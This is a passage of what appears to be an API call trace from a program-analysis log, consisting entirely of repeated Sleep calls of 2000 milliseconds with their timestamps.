(dwMilliseconds=0x7d0) [0244.665] Sleep (dwMilliseconds=0x7d0) [0244.672] Sleep (dwMilliseconds=0x7d0) [0244.678] Sleep (dwMilliseconds=0x7d0) [0244.679] Sleep (dwMilliseconds=0x7d0) [0244.685] Sleep (dwMilliseconds=0x7d0) [0244.686] Sleep (dwMilliseconds=0x7d0) [0244.692] Sleep (dwMilliseconds=0x7d0) [0244.693] Sleep (dwMilliseconds=0x7d0) [0244.698] Sleep (dwMilliseconds=0x7d0) [0244.700] Sleep (dwMilliseconds=0x7d0) [0244.705] Sleep (dwMilliseconds=0x7d0) [0244.707] Sleep (dwMilliseconds=0x7d0) [0244.713] Sleep (dwMilliseconds=0x7d0) [0244.714] Sleep (dwMilliseconds=0x7d0) [0244.719] Sleep (dwMilliseconds=0x7d0) [0244.721] Sleep (dwMilliseconds=0x7d0) [0244.727] Sleep (dwMilliseconds=0x7d0) [0244.729] Sleep (dwMilliseconds=0x7d0) [0244.734] Sleep (dwMilliseconds=0x7d0) [0244.736] Sleep (dwMilliseconds=0x7d0) [0244.739] Sleep (dwMilliseconds=0x7d0) [0244.741] Sleep (dwMilliseconds=0x7d0) [0244.743] Sleep (dwMilliseconds=0x7d0) [0244.748] Sleep (dwMilliseconds=0x7d0) [0244.749] Sleep (dwMilliseconds=0x7d0) [0244.755] Sleep (dwMilliseconds=0x7d0) [0244.756] Sleep (dwMilliseconds=0x7d0) [0244.762] Sleep (dwMilliseconds=0x7d0) [0244.763] Sleep (dwMilliseconds=0x7d0) [0244.768] Sleep (dwMilliseconds=0x7d0) [0244.769] Sleep (dwMilliseconds=0x7d0) [0244.775] Sleep (dwMilliseconds=0x7d0) [0244.776] Sleep (dwMilliseconds=0x7d0) [0244.781] Sleep (dwMilliseconds=0x7d0) [0244.784] Sleep (dwMilliseconds=0x7d0) [0244.787] Sleep (dwMilliseconds=0x7d0) [0244.793] Sleep (dwMilliseconds=0x7d0) [0244.795] Sleep (dwMilliseconds=0x7d0) [0244.800] Sleep (dwMilliseconds=0x7d0) [0244.801] Sleep (dwMilliseconds=0x7d0) [0244.807] Sleep (dwMilliseconds=0x7d0) [0244.808] Sleep (dwMilliseconds=0x7d0) [0244.813] Sleep (dwMilliseconds=0x7d0) [0244.815] Sleep (dwMilliseconds=0x7d0) [0244.820] Sleep (dwMilliseconds=0x7d0) [0244.864] Sleep (dwMilliseconds=0x7d0) [0244.871] Sleep (dwMilliseconds=0x7d0) [0244.878] Sleep (dwMilliseconds=0x7d0) [0244.880] Sleep (dwMilliseconds=0x7d0) [0244.886] Sleep (dwMilliseconds=0x7d0) [0244.892] Sleep (dwMilliseconds=0x7d0) [0244.900] Sleep (dwMilliseconds=0x7d0) [0244.901] Sleep (dwMilliseconds=0x7d0) [0244.907] Sleep (dwMilliseconds=0x7d0) [0244.909] Sleep (dwMilliseconds=0x7d0) [0244.917] Sleep (dwMilliseconds=0x7d0) [0244.918] Sleep (dwMilliseconds=0x7d0) [0244.926] Sleep (dwMilliseconds=0x7d0) [0244.927] Sleep (dwMilliseconds=0x7d0) [0244.934] Sleep (dwMilliseconds=0x7d0) [0244.941] Sleep (dwMilliseconds=0x7d0) [0244.943] Sleep (dwMilliseconds=0x7d0) [0244.949] Sleep (dwMilliseconds=0x7d0) [0244.951] Sleep (dwMilliseconds=0x7d0) [0244.957] Sleep (dwMilliseconds=0x7d0) [0244.958] Sleep (dwMilliseconds=0x7d0) [0244.966] Sleep (dwMilliseconds=0x7d0) [0244.967] Sleep (dwMilliseconds=0x7d0) [0244.974] Sleep (dwMilliseconds=0x7d0) [0244.975] Sleep (dwMilliseconds=0x7d0) [0244.983] Sleep (dwMilliseconds=0x7d0) [0244.990] Sleep (dwMilliseconds=0x7d0) [0244.991] Sleep (dwMilliseconds=0x7d0) [0244.995] Sleep (dwMilliseconds=0x7d0) [0244.997] Sleep (dwMilliseconds=0x7d0) [0245.004] Sleep (dwMilliseconds=0x7d0) [0245.005] Sleep (dwMilliseconds=0x7d0) [0245.010] Sleep (dwMilliseconds=0x7d0) [0245.017] Sleep (dwMilliseconds=0x7d0) [0245.018] Sleep (dwMilliseconds=0x7d0) [0245.023] Sleep (dwMilliseconds=0x7d0) [0245.025] Sleep (dwMilliseconds=0x7d0) [0245.031] Sleep (dwMilliseconds=0x7d0) [0245.033] Sleep (dwMilliseconds=0x7d0) [0245.038] Sleep (dwMilliseconds=0x7d0) [0245.039] Sleep (dwMilliseconds=0x7d0) [0245.045] Sleep (dwMilliseconds=0x7d0) [0245.046] Sleep (dwMilliseconds=0x7d0) [0245.052] Sleep (dwMilliseconds=0x7d0) [0245.053] Sleep (dwMilliseconds=0x7d0) [0245.082] Sleep (dwMilliseconds=0x7d0) [0245.092] Sleep (dwMilliseconds=0x7d0) [0245.102] Sleep (dwMilliseconds=0x7d0) [0245.109] Sleep (dwMilliseconds=0x7d0) [0245.115] Sleep (dwMilliseconds=0x7d0) [0245.116] Sleep (dwMilliseconds=0x7d0) [0245.118] Sleep (dwMilliseconds=0x7d0) [0245.122] Sleep (dwMilliseconds=0x7d0) [0245.124] Sleep (dwMilliseconds=0x7d0) [0245.129] Sleep (dwMilliseconds=0x7d0) [0245.138] Sleep (dwMilliseconds=0x7d0) [0245.144] Sleep (dwMilliseconds=0x7d0) [0245.152] Sleep (dwMilliseconds=0x7d0) [0245.153] Sleep (dwMilliseconds=0x7d0) [0245.159] Sleep (dwMilliseconds=0x7d0) [0245.160] Sleep (dwMilliseconds=0x7d0) [0245.164] Sleep (dwMilliseconds=0x7d0) [0245.166] Sleep (dwMilliseconds=0x7d0) [0245.172] Sleep (dwMilliseconds=0x7d0) [0245.173] Sleep (dwMilliseconds=0x7d0) [0245.178] Sleep (dwMilliseconds=0x7d0) [0245.187] Sleep (dwMilliseconds=0x7d0) [0245.189] Sleep (dwMilliseconds=0x7d0) [0245.195] Sleep (dwMilliseconds=0x7d0) [0245.197] Sleep (dwMilliseconds=0x7d0) [0245.203] Sleep (dwMilliseconds=0x7d0) [0245.209] Sleep (dwMilliseconds=0x7d0) [0245.210] Sleep (dwMilliseconds=0x7d0) [0245.216] Sleep (dwMilliseconds=0x7d0) [0245.218] Sleep (dwMilliseconds=0x7d0) [0245.223] Sleep (dwMilliseconds=0x7d0) [0245.225] Sleep (dwMilliseconds=0x7d0) [0245.230] Sleep (dwMilliseconds=0x7d0) [0245.232] Sleep (dwMilliseconds=0x7d0) [0245.237] Sleep (dwMilliseconds=0x7d0) [0245.238] Sleep (dwMilliseconds=0x7d0) [0245.243] Sleep (dwMilliseconds=0x7d0) [0245.244] Sleep (dwMilliseconds=0x7d0) [0245.252] Sleep (dwMilliseconds=0x7d0) [0245.257] Sleep (dwMilliseconds=0x7d0) [0245.261] Sleep (dwMilliseconds=0x7d0) [0245.270] Sleep (dwMilliseconds=0x7d0) [0245.272] Sleep (dwMilliseconds=0x7d0) [0245.281] Sleep (dwMilliseconds=0x7d0) [0245.288] Sleep (dwMilliseconds=0x7d0) [0245.289] Sleep (dwMilliseconds=0x7d0) [0245.295] Sleep (dwMilliseconds=0x7d0) [0245.297] Sleep (dwMilliseconds=0x7d0) [0245.302] Sleep (dwMilliseconds=0x7d0) [0245.303] Sleep (dwMilliseconds=0x7d0) [0245.305] Sleep (dwMilliseconds=0x7d0) [0245.311] Sleep (dwMilliseconds=0x7d0) [0245.318] Sleep (dwMilliseconds=0x7d0) [0245.320] Sleep (dwMilliseconds=0x7d0) [0245.327] Sleep (dwMilliseconds=0x7d0) [0245.328] Sleep (dwMilliseconds=0x7d0) [0245.334] Sleep (dwMilliseconds=0x7d0) [0245.335] Sleep (dwMilliseconds=0x7d0) [0245.351] Sleep (dwMilliseconds=0x7d0) [0245.353] Sleep (dwMilliseconds=0x7d0) [0245.356] Sleep (dwMilliseconds=0x7d0) [0245.360] Sleep (dwMilliseconds=0x7d0) [0245.362] Sleep (dwMilliseconds=0x7d0) [0245.368] Sleep (dwMilliseconds=0x7d0) [0245.376] Sleep (dwMilliseconds=0x7d0) [0245.385] Sleep (dwMilliseconds=0x7d0) [0245.387] Sleep (dwMilliseconds=0x7d0) [0245.393] Sleep (dwMilliseconds=0x7d0) [0245.394] Sleep (dwMilliseconds=0x7d0) [0245.400] Sleep (dwMilliseconds=0x7d0) [0245.404] Sleep (dwMilliseconds=0x7d0) [0245.407] Sleep (dwMilliseconds=0x7d0) [0245.414] Sleep (dwMilliseconds=0x7d0) [0245.421] Sleep (dwMilliseconds=0x7d0) [0245.422] Sleep (dwMilliseconds=0x7d0) [0245.428] Sleep (dwMilliseconds=0x7d0) [0245.429] Sleep (dwMilliseconds=0x7d0) [0245.436] Sleep (dwMilliseconds=0x7d0) [0245.437] Sleep (dwMilliseconds=0x7d0) [0245.443] Sleep (dwMilliseconds=0x7d0) [0245.444] Sleep (dwMilliseconds=0x7d0) [0245.448] Sleep (dwMilliseconds=0x7d0) [0245.451] Sleep (dwMilliseconds=0x7d0) [0245.452] Sleep (dwMilliseconds=0x7d0) [0245.459] Sleep (dwMilliseconds=0x7d0) [0245.488] Sleep (dwMilliseconds=0x7d0) [0245.489] Sleep (dwMilliseconds=0x7d0) [0245.495] Sleep (dwMilliseconds=0x7d0) [0245.497] Sleep (dwMilliseconds=0x7d0) [0245.502] Sleep (dwMilliseconds=0x7d0) [0245.503] Sleep (dwMilliseconds=0x7d0) [0245.512] Sleep (dwMilliseconds=0x7d0) [0245.516] Sleep (dwMilliseconds=0x7d0) [0245.519] Sleep (dwMilliseconds=0x7d0) [0245.520] Sleep (dwMilliseconds=0x7d0) [0245.527] Sleep (dwMilliseconds=0x7d0) [0245.528] Sleep (dwMilliseconds=0x7d0) [0245.534] Sleep (dwMilliseconds=0x7d0) [0245.535] Sleep (dwMilliseconds=0x7d0) [0245.540] Sleep (dwMilliseconds=0x7d0) [0245.542] Sleep (dwMilliseconds=0x7d0) [0245.547] Sleep (dwMilliseconds=0x7d0) [0245.549] Sleep (dwMilliseconds=0x7d0) [0245.554] Sleep (dwMilliseconds=0x7d0) [0245.555] Sleep (dwMilliseconds=0x7d0) [0245.560] Sleep (dwMilliseconds=0x7d0) [0245.562] Sleep (dwMilliseconds=0x7d0) [0245.568] Sleep (dwMilliseconds=0x7d0) [0245.570] Sleep (dwMilliseconds=0x7d0) [0245.575] Sleep (dwMilliseconds=0x7d0) [0245.576] Sleep (dwMilliseconds=0x7d0) [0245.582] Sleep (dwMilliseconds=0x7d0) [0245.588] Sleep (dwMilliseconds=0x7d0) [0245.596] Sleep (dwMilliseconds=0x7d0) [0245.597] Sleep (dwMilliseconds=0x7d0) [0245.602] Sleep (dwMilliseconds=0x7d0) [0245.603] Sleep (dwMilliseconds=0x7d0) [0245.608] Sleep (dwMilliseconds=0x7d0) [0245.609] Sleep (dwMilliseconds=0x7d0) [0245.616] Sleep (dwMilliseconds=0x7d0) [0245.617] Sleep (dwMilliseconds=0x7d0) [0245.623] Sleep (dwMilliseconds=0x7d0) [0245.629] Sleep (dwMilliseconds=0x7d0) [0245.630] Sleep (dwMilliseconds=0x7d0) [0245.636] Sleep (dwMilliseconds=0x7d0) [0245.642] Sleep (dwMilliseconds=0x7d0) [0245.648] Sleep (dwMilliseconds=0x7d0) [0245.652] Sleep (dwMilliseconds=0x7d0) [0245.658] Sleep (dwMilliseconds=0x7d0) [0245.662] Sleep (dwMilliseconds=0x7d0) [0245.663] Sleep (dwMilliseconds=0x7d0) [0245.672] Sleep (dwMilliseconds=0x7d0) [0245.680] Sleep (dwMilliseconds=0x7d0) [0245.683] Sleep (dwMilliseconds=0x7d0) [0245.690] Sleep (dwMilliseconds=0x7d0) [0245.691] Sleep (dwMilliseconds=0x7d0) [0245.699] Sleep (dwMilliseconds=0x7d0) [0245.700] Sleep (dwMilliseconds=0x7d0) [0245.704] Sleep (dwMilliseconds=0x7d0) [0245.708] Sleep (dwMilliseconds=0x7d0) [0245.709] Sleep (dwMilliseconds=0x7d0) [0245.717] Sleep (dwMilliseconds=0x7d0) [0245.725] Sleep (dwMilliseconds=0x7d0) [0245.726] Sleep (dwMilliseconds=0x7d0) [0245.734] Sleep (dwMilliseconds=0x7d0) [0245.743] Sleep (dwMilliseconds=0x7d0) [0245.745] Sleep (dwMilliseconds=0x7d0) [0245.749] Sleep (dwMilliseconds=0x7d0) [0245.753] Sleep (dwMilliseconds=0x7d0) [0245.754] Sleep (dwMilliseconds=0x7d0) [0245.762] Sleep (dwMilliseconds=0x7d0) [0245.763] Sleep (dwMilliseconds=0x7d0) [0245.771] Sleep (dwMilliseconds=0x7d0) [0245.780] Sleep (dwMilliseconds=0x7d0) [0245.782] Sleep (dwMilliseconds=0x7d0) [0245.790] Sleep (dwMilliseconds=0x7d0) [0245.791] Sleep (dwMilliseconds=0x7d0) [0245.794] Sleep (dwMilliseconds=0x7d0) [0245.800] Sleep (dwMilliseconds=0x7d0) [0245.801] Sleep (dwMilliseconds=0x7d0) [0245.809] Sleep (dwMilliseconds=0x7d0) [0245.811] Sleep (dwMilliseconds=0x7d0) [0245.819] Sleep (dwMilliseconds=0x7d0) [0245.829] Sleep (dwMilliseconds=0x7d0) [0245.830] Sleep (dwMilliseconds=0x7d0) [0245.837] Sleep (dwMilliseconds=0x7d0) [0245.838] Sleep (dwMilliseconds=0x7d0) [0245.844] Sleep (dwMilliseconds=0x7d0) [0245.845] Sleep (dwMilliseconds=0x7d0) [0245.851] Sleep (dwMilliseconds=0x7d0) [0245.858] Sleep (dwMilliseconds=0x7d0) [0245.859] Sleep (dwMilliseconds=0x7d0) [0245.865] Sleep (dwMilliseconds=0x7d0) [0245.866] Sleep (dwMilliseconds=0x7d0) [0245.872] Sleep (dwMilliseconds=0x7d0) [0245.873] Sleep (dwMilliseconds=0x7d0) [0245.879] Sleep (dwMilliseconds=0x7d0) [0245.880] Sleep (dwMilliseconds=0x7d0) [0245.881] Sleep (dwMilliseconds=0x7d0) [0245.887] Sleep (dwMilliseconds=0x7d0) [0245.894] Sleep (dwMilliseconds=0x7d0) [0245.901] Sleep (dwMilliseconds=0x7d0) [0245.909] Sleep (dwMilliseconds=0x7d0) [0245.913] Sleep (dwMilliseconds=0x7d0) [0245.920] Sleep (dwMilliseconds=0x7d0) [0245.922] Sleep (dwMilliseconds=0x7d0) [0245.928] Sleep (dwMilliseconds=0x7d0) [0245.930] Sleep (dwMilliseconds=0x7d0) [0245.931] Sleep (dwMilliseconds=0x7d0) [0245.937] Sleep (dwMilliseconds=0x7d0) [0245.939] Sleep (dwMilliseconds=0x7d0) [0245.946] Sleep (dwMilliseconds=0x7d0) [0245.948] Sleep (dwMilliseconds=0x7d0) [0245.954] Sleep (dwMilliseconds=0x7d0) [0245.961] Sleep (dwMilliseconds=0x7d0) [0245.963] Sleep (dwMilliseconds=0x7d0) [0245.969] Sleep (dwMilliseconds=0x7d0) [0245.970] Sleep (dwMilliseconds=0x7d0) [0245.974] Sleep (dwMilliseconds=0x7d0) [0245.978] Sleep (dwMilliseconds=0x7d0) [0245.980] Sleep (dwMilliseconds=0x7d0) [0245.989] Sleep (dwMilliseconds=0x7d0) [0245.995] Sleep (dwMilliseconds=0x7d0) [0245.997] Sleep (dwMilliseconds=0x7d0) [0246.004] Sleep (dwMilliseconds=0x7d0) [0246.010] Sleep (dwMilliseconds=0x7d0) [0246.012] Sleep (dwMilliseconds=0x7d0) [0246.017] Sleep (dwMilliseconds=0x7d0) [0246.019] Sleep (dwMilliseconds=0x7d0) [0246.025] Sleep (dwMilliseconds=0x7d0) [0246.026] Sleep (dwMilliseconds=0x7d0) [0246.032] Sleep (dwMilliseconds=0x7d0) [0246.033] Sleep (dwMilliseconds=0x7d0) [0246.040] Sleep (dwMilliseconds=0x7d0) [0246.046] Sleep (dwMilliseconds=0x7d0) [0246.047] Sleep (dwMilliseconds=0x7d0) [0246.053] Sleep (dwMilliseconds=0x7d0) [0246.079] Sleep (dwMilliseconds=0x7d0) [0246.127] Sleep (dwMilliseconds=0x7d0) [0246.133] Sleep (dwMilliseconds=0x7d0) [0246.144] Sleep (dwMilliseconds=0x7d0) [0246.149] Sleep (dwMilliseconds=0x7d0) [0246.166] Sleep (dwMilliseconds=0x7d0) [0246.167] Sleep (dwMilliseconds=0x7d0) [0246.176] Sleep (dwMilliseconds=0x7d0) [0246.177] Sleep (dwMilliseconds=0x7d0) [0246.191] Sleep (dwMilliseconds=0x7d0) [0246.201] Sleep (dwMilliseconds=0x7d0) [0246.211] Sleep (dwMilliseconds=0x7d0) [0246.218] Sleep (dwMilliseconds=0x7d0) [0246.228] Sleep (dwMilliseconds=0x7d0) [0246.229] Sleep (dwMilliseconds=0x7d0) [0246.253] Sleep (dwMilliseconds=0x7d0) [0246.255] Sleep (dwMilliseconds=0x7d0) [0246.259] Sleep (dwMilliseconds=0x7d0) [0246.264] Sleep (dwMilliseconds=0x7d0) [0246.265] Sleep (dwMilliseconds=0x7d0) [0246.283] Sleep (dwMilliseconds=0x7d0) [0246.285] Sleep (dwMilliseconds=0x7d0) [0246.295] Sleep (dwMilliseconds=0x7d0) [0246.296] Sleep (dwMilliseconds=0x7d0) [0246.303] Sleep (dwMilliseconds=0x7d0) [0246.306] Sleep (dwMilliseconds=0x7d0) [0246.315] Sleep (dwMilliseconds=0x7d0) [0246.317] Sleep (dwMilliseconds=0x7d0) [0246.325] Sleep (dwMilliseconds=0x7d0) [0246.335] Sleep (dwMilliseconds=0x7d0) [0246.356] Sleep (dwMilliseconds=0x7d0) [0246.358] Sleep (dwMilliseconds=0x7d0) [0246.361] Sleep (dwMilliseconds=0x7d0) [0246.367] Sleep (dwMilliseconds=0x7d0) [0246.369] Sleep (dwMilliseconds=0x7d0) [0246.377] Sleep (dwMilliseconds=0x7d0) [0246.387] Sleep (dwMilliseconds=0x7d0) [0246.389] Sleep (dwMilliseconds=0x7d0) [0246.399] Sleep (dwMilliseconds=0x7d0) [0246.405] Sleep (dwMilliseconds=0x7d0) [0246.408] Sleep (dwMilliseconds=0x7d0) [0246.410] Sleep (dwMilliseconds=0x7d0) [0246.418] Sleep (dwMilliseconds=0x7d0) [0246.427] Sleep (dwMilliseconds=0x7d0) [0246.436] Sleep (dwMilliseconds=0x7d0) [0246.446] Sleep (dwMilliseconds=0x7d0) [0246.448] Sleep (dwMilliseconds=0x7d0) [0246.455] Sleep (dwMilliseconds=0x7d0) [0246.456] Sleep (dwMilliseconds=0x7d0) [0246.464] Sleep (dwMilliseconds=0x7d0) [0246.474] Sleep (dwMilliseconds=0x7d0) [0246.484] Sleep (dwMilliseconds=0x7d0) [0246.486] Sleep (dwMilliseconds=0x7d0) [0246.496] Sleep (dwMilliseconds=0x7d0) [0246.497] Sleep (dwMilliseconds=0x7d0) [0246.507] Sleep (dwMilliseconds=0x7d0) [0246.508] Sleep (dwMilliseconds=0x7d0) [0246.517] Sleep (dwMilliseconds=0x7d0) [0246.527] Sleep (dwMilliseconds=0x7d0) [0246.536] Sleep (dwMilliseconds=0x7d0) [0246.537] Sleep (dwMilliseconds=0x7d0) [0246.540] Sleep (dwMilliseconds=0x7d0) [0246.546] Sleep (dwMilliseconds=0x7d0) [0246.547] Sleep (dwMilliseconds=0x7d0) [0246.555] Sleep (dwMilliseconds=0x7d0) [0246.556] Sleep (dwMilliseconds=0x7d0) [0246.564] Sleep (dwMilliseconds=0x7d0) [0246.566] Sleep (dwMilliseconds=0x7d0) [0246.573] Sleep (dwMilliseconds=0x7d0) [0246.575] Sleep (dwMilliseconds=0x7d0) [0246.583] Sleep (dwMilliseconds=0x7d0) [0246.594] Sleep (dwMilliseconds=0x7d0) [0246.603] Sleep (dwMilliseconds=0x7d0) [0246.611] Sleep (dwMilliseconds=0x7d0) [0246.613] Sleep (dwMilliseconds=0x7d0) [0246.621] Sleep (dwMilliseconds=0x7d0) [0246.626] Sleep (dwMilliseconds=0x7d0) [0246.632] Sleep (dwMilliseconds=0x7d0) [0246.633] Sleep (dwMilliseconds=0x7d0) [0246.641] Sleep (dwMilliseconds=0x7d0) [0246.643] Sleep (dwMilliseconds=0x7d0) [0246.651] Sleep (dwMilliseconds=0x7d0) [0246.663] Sleep (dwMilliseconds=0x7d0) [0246.664] Sleep (dwMilliseconds=0x7d0) [0246.671] Sleep (dwMilliseconds=0x7d0) [0246.674] Sleep (dwMilliseconds=0x7d0) [0246.675] Sleep (dwMilliseconds=0x7d0) [0246.683] Sleep (dwMilliseconds=0x7d0) [0246.685] Sleep (dwMilliseconds=0x7d0) [0246.695] Sleep (dwMilliseconds=0x7d0) [0246.704] Sleep (dwMilliseconds=0x7d0) [0246.705] Sleep (dwMilliseconds=0x7d0) [0246.714] Sleep (dwMilliseconds=0x7d0) [0246.716] Sleep (dwMilliseconds=0x7d0) [0246.718] Sleep (dwMilliseconds=0x7d0) [0246.725] Sleep (dwMilliseconds=0x7d0) [0246.726] Sleep (dwMilliseconds=0x7d0) [0246.737] Sleep (dwMilliseconds=0x7d0) [0246.749] Sleep (dwMilliseconds=0x7d0) [0246.758] Sleep (dwMilliseconds=0x7d0) [0246.764] Sleep (dwMilliseconds=0x7d0) [0246.768] Sleep (dwMilliseconds=0x7d0) [0246.769] Sleep (dwMilliseconds=0x7d0) [0246.778] Sleep (dwMilliseconds=0x7d0) [0246.779] Sleep (dwMilliseconds=0x7d0) [0246.788] Sleep (dwMilliseconds=0x7d0) [0246.790] Sleep (dwMilliseconds=0x7d0) [0246.799] Sleep (dwMilliseconds=0x7d0) [0246.824] Sleep (dwMilliseconds=0x7d0) [0246.829] Sleep (dwMilliseconds=0x7d0) [0246.837] Sleep (dwMilliseconds=0x7d0) [0246.839] Sleep (dwMilliseconds=0x7d0) [0246.850] Sleep (dwMilliseconds=0x7d0) [0246.859] Sleep (dwMilliseconds=0x7d0) [0246.869] Sleep (dwMilliseconds=0x7d0) [0246.871] Sleep (dwMilliseconds=0x7d0) [0246.873] Sleep (dwMilliseconds=0x7d0) [0246.880] Sleep (dwMilliseconds=0x7d0) [0246.882] Sleep (dwMilliseconds=0x7d0) [0246.891] Sleep (dwMilliseconds=0x7d0) [0246.893] Sleep (dwMilliseconds=0x7d0) [0246.903] Sleep (dwMilliseconds=0x7d0) [0246.911] Sleep (dwMilliseconds=0x7d0) [0246.912] Sleep (dwMilliseconds=0x7d0) [0246.918] Sleep (dwMilliseconds=0x7d0) [0246.920] Sleep (dwMilliseconds=0x7d0) [0246.921] Sleep (dwMilliseconds=0x7d0) [0246.929] Sleep (dwMilliseconds=0x7d0) [0246.930] Sleep (dwMilliseconds=0x7d0) [0246.938] Sleep (dwMilliseconds=0x7d0) [0246.947] Sleep (dwMilliseconds=0x7d0) [0246.948] Sleep (dwMilliseconds=0x7d0) [0246.957] Sleep (dwMilliseconds=0x7d0) [0246.963] Sleep (dwMilliseconds=0x7d0) [0246.967] Sleep (dwMilliseconds=0x7d0) [0246.979] Sleep (dwMilliseconds=0x7d0) [0246.986] Sleep (dwMilliseconds=0x7d0) [0246.987] Sleep (dwMilliseconds=0x7d0) [0246.992] Sleep (dwMilliseconds=0x7d0) [0246.995] Sleep (dwMilliseconds=0x7d0) [0247.001] Sleep (dwMilliseconds=0x7d0) [0247.007] Sleep (dwMilliseconds=0x7d0) [0247.008] Sleep (dwMilliseconds=0x7d0) [0247.012] Sleep (dwMilliseconds=0x7d0) [0247.014] Sleep (dwMilliseconds=0x7d0) [0247.021] Sleep (dwMilliseconds=0x7d0) [0247.022] Sleep (dwMilliseconds=0x7d0) [0247.028] Sleep (dwMilliseconds=0x7d0) [0247.029] Sleep (dwMilliseconds=0x7d0) [0247.034] Sleep (dwMilliseconds=0x7d0) [0247.040] Sleep (dwMilliseconds=0x7d0) [0247.041] Sleep (dwMilliseconds=0x7d0) [0247.049] Sleep (dwMilliseconds=0x7d0) [0247.050] Sleep (dwMilliseconds=0x7d0) [0247.056] Sleep (dwMilliseconds=0x7d0) [0247.078] Sleep (dwMilliseconds=0x7d0) [0247.085] Sleep (dwMilliseconds=0x7d0) [0247.091] Sleep (dwMilliseconds=0x7d0) [0247.097] Sleep (dwMilliseconds=0x7d0) [0247.099] Sleep (dwMilliseconds=0x7d0) [0247.105] Sleep (dwMilliseconds=0x7d0) [0247.111] Sleep (dwMilliseconds=0x7d0) [0247.118] Sleep (dwMilliseconds=0x7d0) [0247.124] Sleep (dwMilliseconds=0x7d0) [0247.125] Sleep (dwMilliseconds=0x7d0) [0247.131] Sleep (dwMilliseconds=0x7d0) [0247.132] Sleep (dwMilliseconds=0x7d0) [0247.138] Sleep (dwMilliseconds=0x7d0) [0247.140] Sleep (dwMilliseconds=0x7d0) [0247.145] Sleep (dwMilliseconds=0x7d0) [0247.147] Sleep (dwMilliseconds=0x7d0) [0247.152] Sleep (dwMilliseconds=0x7d0) [0247.154] Sleep (dwMilliseconds=0x7d0) [0247.160] Sleep (dwMilliseconds=0x7d0) [0247.161] Sleep (dwMilliseconds=0x7d0) [0247.163] Sleep (dwMilliseconds=0x7d0) [0247.167] Sleep (dwMilliseconds=0x7d0) [0247.168] Sleep (dwMilliseconds=0x7d0) [0247.174] Sleep (dwMilliseconds=0x7d0) [0247.175] Sleep (dwMilliseconds=0x7d0) [0247.181] Sleep (dwMilliseconds=0x7d0) [0247.182] Sleep (dwMilliseconds=0x7d0) [0247.188] Sleep (dwMilliseconds=0x7d0) [0247.189] Sleep (dwMilliseconds=0x7d0) [0247.196] Sleep (dwMilliseconds=0x7d0) [0247.203] Sleep (dwMilliseconds=0x7d0) [0247.207] Sleep (dwMilliseconds=0x7d0) [0247.214] Sleep (dwMilliseconds=0x7d0) [0247.215] Sleep (dwMilliseconds=0x7d0) [0247.223] Sleep (dwMilliseconds=0x7d0) [0247.225] Sleep (dwMilliseconds=0x7d0) [0247.233] Sleep (dwMilliseconds=0x7d0) [0247.234] Sleep (dwMilliseconds=0x7d0) [0247.243] Sleep (dwMilliseconds=0x7d0) [0247.251] Sleep (dwMilliseconds=0x7d0) [0247.253] Sleep (dwMilliseconds=0x7d0) [0247.264] Sleep (dwMilliseconds=0x7d0) [0247.266] Sleep (dwMilliseconds=0x7d0) [0247.274] Sleep (dwMilliseconds=0x7d0) [0247.276] Sleep (dwMilliseconds=0x7d0) [0247.283] Sleep (dwMilliseconds=0x7d0) [0247.292] Sleep (dwMilliseconds=0x7d0) [0247.298] Sleep (dwMilliseconds=0x7d0) [0247.301] Sleep (dwMilliseconds=0x7d0) [0247.302] Sleep (dwMilliseconds=0x7d0) [0247.314] Sleep (dwMilliseconds=0x7d0) [0247.321] Sleep (dwMilliseconds=0x7d0) [0247.323] Sleep (dwMilliseconds=0x7d0) [0247.330] Sleep (dwMilliseconds=0x7d0) [0247.337] Sleep (dwMilliseconds=0x7d0) [0247.339] Sleep (dwMilliseconds=0x7d0) [0247.355] Sleep (dwMilliseconds=0x7d0) [0247.358] Sleep (dwMilliseconds=0x7d0) [0247.360] Sleep (dwMilliseconds=0x7d0) [0247.367] Sleep (dwMilliseconds=0x7d0) [0247.378] Sleep (dwMilliseconds=0x7d0) [0247.379] Sleep (dwMilliseconds=0x7d0) [0247.389] Sleep (dwMilliseconds=0x7d0) [0247.390] Sleep (dwMilliseconds=0x7d0) [0247.398] Sleep (dwMilliseconds=0x7d0) [0247.401] Sleep (dwMilliseconds=0x7d0) [0247.408] Sleep (dwMilliseconds=0x7d0) [0247.416] Sleep (dwMilliseconds=0x7d0) [0247.426] Sleep (dwMilliseconds=0x7d0) [0247.436] Sleep (dwMilliseconds=0x7d0) [0247.444] Sleep (dwMilliseconds=0x7d0) [0247.446] Sleep (dwMilliseconds=0x7d0) [0247.454] Sleep (dwMilliseconds=0x7d0) [0247.455] Sleep (dwMilliseconds=0x7d0) [0247.463] Sleep (dwMilliseconds=0x7d0) [0247.464] Sleep (dwMilliseconds=0x7d0) [0247.472] Sleep (dwMilliseconds=0x7d0) [0247.473] Sleep (dwMilliseconds=0x7d0) [0247.482] Sleep (dwMilliseconds=0x7d0) [0247.483] Sleep (dwMilliseconds=0x7d0) [0247.490] Sleep (dwMilliseconds=0x7d0) [0247.492] Sleep (dwMilliseconds=0x7d0) [0247.499] Sleep (dwMilliseconds=0x7d0) [0247.508] Sleep (dwMilliseconds=0x7d0) [0247.517] Sleep (dwMilliseconds=0x7d0) [0247.518] Sleep (dwMilliseconds=0x7d0) [0247.526] Sleep (dwMilliseconds=0x7d0) [0247.528] Sleep (dwMilliseconds=0x7d0) [0247.535] Sleep (dwMilliseconds=0x7d0) [0247.536] Sleep (dwMilliseconds=0x7d0) [0247.545] Sleep (dwMilliseconds=0x7d0) [0247.546] Sleep (dwMilliseconds=0x7d0) [0247.553] Sleep (dwMilliseconds=0x7d0) [0247.555] Sleep (dwMilliseconds=0x7d0) [0247.563] Sleep (dwMilliseconds=0x7d0) [0247.571] Sleep (dwMilliseconds=0x7d0) [0247.578] Sleep (dwMilliseconds=0x7d0) [0247.580] Sleep (dwMilliseconds=0x7d0) [0247.589] Sleep (dwMilliseconds=0x7d0) [0247.591] Sleep (dwMilliseconds=0x7d0) [0247.599] Sleep (dwMilliseconds=0x7d0) [0247.601] Sleep (dwMilliseconds=0x7d0) [0247.610] Sleep (dwMilliseconds=0x7d0) [0247.618] Sleep (dwMilliseconds=0x7d0) [0247.619] Sleep (dwMilliseconds=0x7d0) [0247.625] Sleep (dwMilliseconds=0x7d0) [0247.628] Sleep (dwMilliseconds=0x7d0) [0247.629] Sleep (dwMilliseconds=0x7d0) [0247.638] Sleep (dwMilliseconds=0x7d0) [0247.647] Sleep (dwMilliseconds=0x7d0) [0247.648] Sleep (dwMilliseconds=0x7d0) [0247.659] Sleep (dwMilliseconds=0x7d0) [0247.663] Sleep (dwMilliseconds=0x7d0) [0247.672] Sleep (dwMilliseconds=0x7d0) [0247.684] 